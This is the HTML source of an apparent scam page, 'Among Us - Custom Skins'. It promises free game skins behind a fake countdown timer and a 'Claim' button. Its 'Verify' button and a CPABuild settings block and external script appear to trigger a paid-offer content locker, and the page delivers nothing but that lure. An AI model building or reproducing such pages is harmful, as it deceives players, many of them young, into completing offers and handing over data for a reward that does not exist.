<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Among Us - Custom Skins</title>
    <link rel="stylesheet" href="boostrap.css">
    <script async src="https://arc.io/widget.min.js#QQNmGKjV"></script>
    <link rel="stylesheet" href="style%EF%B9%96v=7.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://vignette.wikia.nocookie.net/among-us-wiki/images/a/a6/1_red.png/revision/latest/top-crop/width/360/height/450?cb=20200912125145"/>
<link rel="icon" type="image/png" href="hhttps://vignette.wikia.nocookie.net/among-us-wiki/images/a/a6/1_red.png/revision/latest/top-crop/width/360/height/450?cb=20200912125145"/>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-167371512-4"></script>
<script data-ad-client="ca-pub-7450451675487909" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>


</head>

<body>
    <div id="particles-js" style="background-color: #000000;"></div>

    <div id="main-box">
<img src="https://cdn.discordapp.com/attachments/707890135491936308/776889782646865940/steee.png" style="
    height: 8vh;
    margin-top: 20px;
    margin-bottom: 2px;
">

        <div class="firstStep">
            <div class="holderInput">                   
                <h1 style="font-size: 25px;">Select 3 Custom Skins</h1>
                <h1>Limited Offer: <span class="timeLeft">04:43</span></h1>
            </div>

            <div class="items"></div>

            <button class="claim" onclick="claim()">Claim skins to your device</button>
            
            

        </div>

        <div class="verifying">
            <p class="status"></p>
            <button class="verify" onclick="CPABuildLock();">Verify</button>
        </div>
    </div>
    <!-- particles.js lib - https://github.com/VincentGarreau/particles.js -->
    <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <!-- partial -->
    <script src="script%EF%B9%96v=4.js"></script>
    <script src="core%EF%B9%96v=22.js"></script>

</body>

</html>

<script type="text/javascript">
    var CPABUILDSETTINGS={"it":1190389,"key":"3fc48"};
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/646f086.js"></script>